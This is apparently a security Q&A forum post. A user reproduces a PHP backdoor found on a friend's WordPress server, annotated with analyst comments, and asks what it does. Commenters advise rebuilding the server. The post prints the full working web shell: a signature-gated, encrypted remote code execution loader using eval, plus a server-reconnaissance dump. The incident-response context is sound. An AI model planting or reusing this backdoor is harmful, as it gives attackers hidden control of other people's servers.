
A friend found several suspicious PHP files on his server when he was upgrading his WordPress install. They are all in the public_html folder and the filenames are the name of his domain with seemingly random digits next to it.

I've "beautified" the code but, in the actual file, it is all just one long line of code (which makes me suspicious).

Here is the code...

<?php $_5fc427e4 = "aes-128-cbc"; // cipher name passed to openssl_decrypt/openssl_encrypt by the helpers further down
// Analyst annotation: this script takes AES-encrypted PHP source from POST fields "0".."9",
// accepts the request only if an RSA-signed, time-limited token in the X-Cww-Tag request
// header checks out against the embedded public key, and then executes the decrypted source
// with eval() (create_function() / write-and-include as fallbacks). Its output is gzipped and
// AES-encrypted through an output-buffer callback before it reaches the wire. Identifiers are
// hashed to hide intent; the comments below describe only what each statement visibly does.
$_be5af5e5 = "//CWWSUBSCRIPT//"; // marker every decrypted payload must start with (checked in _35d71fd2)
$_ca907758 =
    "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDdUlla2FyWFV0MndVYm5ERCtkWDg3anJWcQpmbUQ0a2IzUU16d1NsY01rMWp2K1hLd3p0SGI0ejdzT3VGYnBoR0ZFS3pveVpzL0Izd2tLUFJReDdONmlQQVdOCjR2U3B1ek50QWorbzFxYkxsMmNyOXhpT1NRbzh0eXFMb0tJM3VmaTNRMEpxbnVubHpKSHJMYWpJR3ZBejU0ZWwKTndBdFdPQjJKV1RNS3FlMG93SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQo="; // base64 of a PEM "-----BEGIN PUBLIC KEY-----" block (the "LS0tLS1CRUdJTiBQVUJMSUMgS0VZ" prefix decodes to that header); loaded with openssl_pkey_get_public() below
$VERSION = "0.3.0"; // the backdoor's own version string
$ID =
    $VERSION .
    " php-" .
    PHP_VERSION .
    "/" .
    PHP_OS .
    "/" .
    $_SERVER["SERVER_SOFTWARE"]; // host fingerprint, returned hex-encoded in the X-Cww-Id response header by _b8e6b0c7
error_reporting(0); // silence notices/warnings so failures leave nothing in the PHP error log
@set_time_limit(3600);
@ini_set("implicit_flush", "On");
@ini_set("default_socket_timeout", "3600");
@ini_set("file_uploads", "On");
@ini_set("max_execution_time", "3600");
@ini_set("max_input_time", "3600");
@ini_set("upload_max_filesize", "32M");
@ini_set("post_max_size", "32M"); // long-running, large-upload-friendly runtime; "@" hides failures where ini_set is restricted
$_b632135e = $_SERVER["REQUEST_METHOD"][0]
    ? $_SERVER["REQUEST_METHOD"][0]
    : "P"; // first letter of the HTTP method: "G" selects the debug path, "P" (also the default) the command path
if ($_b632135e == "G") {
    // GET ?debug=<value>: if <value> matches the first line of ./cwwdebug.data, dump server
    // details via _99412630. A cwwdebug.data file next to the script is an indicator of compromise.
    if (isset($_GET["debug"]) && _f454d8cb("./cwwdebug.data", $_GET["debug"])) {
        error_reporting(-1);
        _99412630();
        exit();
    }
}
if ($_b632135e != "P") {
    _b8e6b0c7(10); // any method other than POST ends here with "HTTP/1.1 202 10"
}
$_7a03a6d6 = false;
// Look for an X-Cww-Tag request header (hex text); that header name in access/WAF logs is a
// detection hook. Note the foreach value variable is the same as the result variable, so when
// the header is absent $_7a03a6d6 holds the last $_SERVER value rather than false, and the
// "=== false" check below does not fire.
foreach ($_SERVER as $_52b6f489 => $_7a03a6d6) {
    if (strtolower($_52b6f489) == "http_x_cww_tag") {
        $_7a03a6d6 = pack("H*", $_7a03a6d6); // hex -> raw bytes
        break;
    }
}
if ($_7a03a6d6 === false) {
    _b8e6b0c7(20);
}
$_897afce9 = false;
// "Decrypting" with the embedded RSA public key only yields plaintext if the tag was produced
// with the operator's matching private key, i.e. this is effectively a signature check.
$_2ae84ba2 = openssl_pkey_get_public(base64_decode($_ca907758));
openssl_public_decrypt($_7a03a6d6, $_897afce9, $_2ae84ba2);
openssl_free_key($_2ae84ba2);
if (!$_897afce9) {
    _b8e6b0c7(30);
}
// Recovered tag must be "<10-digit unix time>:<32 hex chars>:<32 hex chars>"
$_0496934c = preg_match_all(
    '/^([0-9]{10}):([0-9a-f]{32}):([0-9a-f]{32})$/i',
    $_897afce9,
    $_ed0783be
);
if (!$_0496934c) {
    _b8e6b0c7(40);
}
if ($_ed0783be[1][0] < time()) {
    _b8e6b0c7(50); // first field is an expiry timestamp; stale tags are rejected
}
$_011ea5f3 = [];
$_011ea5f3[0] = pack("H*", $_ed0783be[2][0]); // 32 hex chars -> 16-byte AES-128 key taken from the tag
$_011ea5f3[1] = pack("H*", $_ed0783be[3][0]); // 32 hex chars -> 16-byte CBC IV taken from the tag
// Choose a code-execution primitive: eval, else create_function, else write a temp file and include it
if (eval("return 1;")) {
    $_6ebae9e7 = 1;
} elseif (is_callable("create_function")) {
    $_6ebae9e7 = 2;
} elseif (is_callable("file_put_contents")) {
    $_6ebae9e7 = 3;
} else {
    _b8e6b0c7(60);
}
$_f178c330 = [];
// Decrypt + gunzip POST fields "9" down to "0" into plaintext PHP. _35d71fd2 returns -1 for an
// empty field (tolerated, slot stays empty) and 1..3 on failure (exit with 71..73).
for ($i = 9; $i >= 0; $i--) {
    $_ffc1d021 = _35d71fd2($_POST[$i], $_f178c330[$i]);
    if ($_ffc1d021 > 0) {
        _b8e6b0c7($_ffc1d021 + 70);
    }
}
if (empty($_f178c330[9])) {
    _b8e6b0c7(80); // field "9" is mandatory
}
while (@ob_end_clean()); // drop any output the host application already buffered
$_5daa2f51 = 32; // chunk count after which the output callback emits an encrypted line
ob_start("_97e99099", 2); // from here on everything echoed is gzipped + AES-encrypted by _97e99099
_b8e6b0c7(0); // send "200 OK" and the X-Cww-Id header, then continue (code 0 does not exit)
// Execute the decrypted payloads in slot order 0..9 with the primitive chosen above. Each
// payload is expected to return a truthy value; anything else is treated as failure (exit 90+slot).
for ($_3713da68 = 0; $_3713da68 <= 9; $_3713da68++) {
    if (empty($_f178c330[$_3713da68])) {
        continue;
    }
    $_d84792e0 = false;
    switch ($_6ebae9e7) {
        case 1:
            if (!eval($_f178c330[$_3713da68])) { // direct eval of attacker-supplied source
                $_d84792e0 = true;
            }
            break;
        case 2:
            if (
                !call_user_func(create_function(null, $_f178c330[$_3713da68])) // source becomes an anonymous function body
            ) {
                $_d84792e0 = true;
            }
            break;
        case 3:
            // Write "<?php <payload> return false; ?>" to a temp file named from time(), include it,
            // then delete it. Short-lived .tmp files in sys_get_temp_dir() are a forensic trace of this path.
            $_2226298e = tempnam(sys_get_temp_dir(), time());
            if (
                file_put_contents(
                    $_2226298e,
                    "<?php\n" .
                        $_f178c330[$_3713da68] .
                        "\nreturn false;\n?" .
                        ">"
                )
            ) {
                if (!include $_2226298e) {
                    $_d84792e0 = true;
                }
                unlink($_2226298e);
            } else {
                $_d84792e0 = true;
            }
            break;
    }
    if ($_d84792e0) {
        _b8e6b0c7(90 + $_3713da68);
    }
}
ob_end_flush(); // triggers the final encrypted flush in _97e99099
while (@ob_end_flush());
exit();
// Send the response headers and, for a non-zero code, terminate the request.
// Non-zero codes are carried out-of-band as the HTTP reason phrase ("HTTP/1.1 202 <code>");
// code 0 sends "200 OK" and returns so payload output can follow. Every response carries
// "X-Cww-Id: <hex of $ID>", which makes this backdoor easy to hunt for in proxy/WAF logs.
function _b8e6b0c7($_4a728cd2)
{
    global $ID;
    if ($_4a728cd2 > 0) {
        header("HTTP/1.1 202 $_4a728cd2"); // numeric error code in place of the reason phrase
        header("Connection: close", true);
    } else {
        header("HTTP/1.1 200 OK");
    }
    header("X-Cww-Id: " . implode(unpack("H*", $ID))); // unpack("H*") hex-encodes the $ID fingerprint
    header("Cache-Control: must-revalidate");
    header("Pragma: no-cache");
    header("Expires: Thu,1 Jan 1970 00:00:01 GMT"); // anti-caching headers (note the malformed date)
    flush();
    if (!$_4a728cd2) {
        return; // code 0: keep running
    }
    exit();
}
// AES-128-CBC decrypt $_5063af5c into $_22acf907 (both by reference) using the key and IV
// recovered from the request tag ($_011ea5f3[0], $_011ea5f3[1]). The options argument is
// false (0), so the ciphertext is expected as base64 text. Returns true on success, false otherwise.
function _ceee992a(&$_5063af5c, &$_22acf907)
{
    global $_011ea5f3, $_5fc427e4;
    $_22acf907 = openssl_decrypt(
        $_5063af5c,
        $_5fc427e4,
        $_011ea5f3[0],
        false,
        $_011ea5f3[1]
    );
    return $_22acf907 || false; // coerce the string|false result to a boolean
}
// AES-128-CBC encrypt $_269f3677 into $_5063af5c (both by reference) with the same per-request
// key/IV used for decryption, so replies are protected with the key the operator supplied in
// the tag. Options false (0) means the output is base64 text. Returns true on success.
function _cf76f9f4(&$_269f3677, &$_5063af5c)
{
    global $_011ea5f3, $_5fc427e4;
    $_5063af5c = openssl_encrypt(
        $_269f3677,
        $_5fc427e4,
        $_011ea5f3[0],
        false,
        $_011ea5f3[1]
    );
    return $_5063af5c || false; // coerce the string|false result to a boolean
}
// Gunzip $_16ae1ab0 into $_298c83b2 (by reference); returns true on success, false otherwise.
// Uses gzdecode() when the zlib extension provides it; otherwise walks the RFC 1952 gzip header
// by hand and inflates the raw deflate stream that sits between the header and the 8-byte
// CRC32/ISIZE trailer. The fallback keeps the tool working on minimal PHP builds.
function _2e082d06(&$_16ae1ab0, &$_298c83b2)
{
    if (function_exists("gzdecode")) {
        $_298c83b2 = gzdecode($_16ae1ab0);
        return $_298c83b2 || false;
    } elseif (substr($_16ae1ab0, 0, 3) == "\x1f\x8b\x08") { // gzip magic bytes + CM=8 (deflate)
        $_3713da68 = 10; // fixed gzip header is 10 bytes
        $_d59a8e8c = ord(substr($_16ae1ab0, 3, 1)); // FLG byte
        if ($_d59a8e8c > 0) {
            if ($_d59a8e8c & 4) { // FEXTRA: 2-byte little-endian length followed by that many bytes
                list($_c4c8650e) = unpack(
                    "v",
                    substr($_16ae1ab0, $_3713da68, 2)
                );
                $_3713da68 += 2 + $_c4c8650e;
            }
            if ($_d59a8e8c & 8) { // FNAME: NUL-terminated original file name
                $_3713da68 = strpos($_16ae1ab0, "\0", $_3713da68) + 1;
            }
            if ($_d59a8e8c & 16) { // FCOMMENT: NUL-terminated comment
                $_3713da68 = strpos($_16ae1ab0, "\0", $_3713da68) + 1;
            }
            if ($_d59a8e8c & 2) { // FHCRC: 2-byte header CRC
                $_3713da68 += 2;
            }
        }
        $_298c83b2 = gzinflate(substr($_16ae1ab0, $_3713da68, -8)); // skip header, drop trailer
        return $_298c83b2 || false;
    }
    return false;
}
// Turn one encrypted POST field $_5063af5c into plaintext PHP in $_22acf907 (by reference).
// Pipeline: AES decrypt (_ceee992a) -> gunzip (_2e082d06) -> require the "//CWWSUBSCRIPT//"
// marker at offset 0. Return codes: -1 empty input, 0 ok, 1 decrypt failed, 2 decompress
// failed, 3 marker missing; the caller adds 70 to positive codes for its 202 status.
function _35d71fd2(&$_5063af5c, &$_22acf907)
{
    global $_be5af5e5;
    if (empty($_5063af5c)) {
        return -1;
    }
    $_16ae1ab0 = false;
    if (!_ceee992a($_5063af5c, $_16ae1ab0)) {
        return 1;
    }
    if (!_2e082d06($_16ae1ab0, $_22acf907)) {
        return 2;
    }
    $_c891de4a = strpos($_22acf907, $_be5af5e5); // marker must be the very first bytes
    if ($_c891de4a === false || $_c891de4a != 0) {
        return 3;
    }
    return 0;
}
// State shared with the output-buffer callback _97e99099: pending output and the number of
// chunks collected since the last encrypted flush.
$_1e23290b = "";
$_ab7bcfbf = 0;
// Output-buffer callback installed by ob_start("_97e99099", 2). Accumulates emitted output in
// $_1e23290b; once the handler's phase argument $_b46ca1b2 is non-zero or more than $_5daa2f51
// chunks have been collected, it gzips the buffer, AES-encrypts it via _cf76f9f4 and returns the
// result as one base64 line. Otherwise returns null, so nothing leaves the server in the clear.
function _97e99099($_c9fd7070, $_b46ca1b2)
{
    global $_1e23290b, $_ab7bcfbf, $_5daa2f51;
    $_1e23290b .= $_c9fd7070;
    $_ab7bcfbf++;
    $_4b8df1b0 = null;
    if ($_1e23290b && ($_b46ca1b2 || $_ab7bcfbf > $_5daa2f51)) {
        global $_011ea5f3;
        $_4d08b43b = gzencode($_1e23290b);
        // _cf76f9f4 declares two parameters; the extra key/IV arguments are ignored by PHP
        // and the function reads them from the globals instead
        _cf76f9f4($_4d08b43b, $_4b8df1b0, $_011ea5f3[0], $_011ea5f3[1]);
        $_4b8df1b0 .= "\n"; // one encrypted line per flush
        $_ab7bcfbf = 0;
        $_1e23290b = null;
    }
    return $_4b8df1b0;
}
// Debug gate: returns true when $_ec530a51 equals the trimmed first line of file $_81a3c9f8
// (called with "./cwwdebug.data" and the ?debug= query value). The comparison is loose (==),
// so PHP numeric-string juggling applies. Returns false when the file cannot be opened.
function _f454d8cb($_81a3c9f8, $_ec530a51)
{
    if ($_68727f18 = fopen($_81a3c9f8, "r")) {
        $_f4de9e3e = fgets($_68727f18); // first line only
        fclose($_68727f18);
        return $_ec530a51 == trim($_f4de9e3e);
    }
    return false;
}
// Debug/reconnaissance dump reached via GET ?debug=... (see _f454d8cb). Prints the version,
// all globals (including $_SERVER), which execution/crypto/compression functions the host
// exposes, the working directory and its stat(), supported OpenSSL ciphers, the server time and
// a tag-stripped phpinfo(). Everything here is server-information disclosure to the operator.
function _99412630()
{
    global $ID;
    echo "<html><pre>\n";
    echo "OUR VERSION: " . pack("H*", $ID) . "\n\n"; // NOTE(review): $ID is not hex, so pack("H*") likely yields garbage here
    echo "GLOBAL VARS:\n";
    print_r($GLOBALS); // includes $_SERVER and the request data
    $_227afe03 = [
        "openssl_get_cipher_methods",
        "openssl_pkey_get_private",
        "openssl_private_decrypt",
        "openssl_decrypt",
        "openssl_encrypt",
        "gzdecode",
        "gzencode",
        "gzinflate",
        "create_function",
        "call_user_func",
        "file_put_contents",
        "tempnam",
    ]; // capability probe: which of the functions the command path relies on are present/callable
    echo "\n\nAVAILABLE FUNCTIONS:\n";
    foreach ($_227afe03 as $f) {
        echo "$f():\te:" .
            (function_exists($f) + 0) . // e: exists
            ",c:" .
            (is_callable($f) + 0) . // c: callable (not blocked by disable_functions)
            "\n";
    }
    echo "\n\nCURRENT DIR AND STATS:\n";
    echo getcwd() . "\n";
    print_r(stat("."));
    if (is_callable("openssl_get_cipher_methods")) {
        echo "\n\nOPENSSL SUPPORTED METHODS:\n";
        print_r(openssl_get_cipher_methods());
    }
    echo "\n\nTHIS SERVER DATE/TIME:\n";
    echo date("r"); // lets the operator align token expiry with server clock
    if (is_callable("phpinfo")) {
        echo "\n\nPHP INFO:\n";
        ob_start();
        phpinfo();
        $_aabae31f = ob_get_contents();
        ob_end_clean();
        $_aabae31f = preg_replace("/<[^>]+>/i", "\t", $_aabae31f); // strip HTML tags from phpinfo output
        echo "$_aabae31f\n</pre></html>";
    } else {
        echo "\n\nPHP INFO:(func is not callable)\n";
    }
} ?>

Can anyone confirm if this is malware or not? And, if so, what is it doing roughly?

    Unfortunately, we are not a code analysis site. The linked duplicate will help you decipher the obfuscated code. However, you don't need to know what the code does to conclude that is it malicious. Rebuild the server from scratch. It's been compromised. – schroeder Dec 02 '22 at 13:23
  • @schroeder thank you. Yes, I was 99% sure it was malicious but I wanted to know what information they have stolen or what the code was doing just to see how "bad" it is. However, I completely get your point and those tools linked in the duplicate post are very useful so thank you for pointing me in the right directions. – John T Dec 03 '22 at 14:55
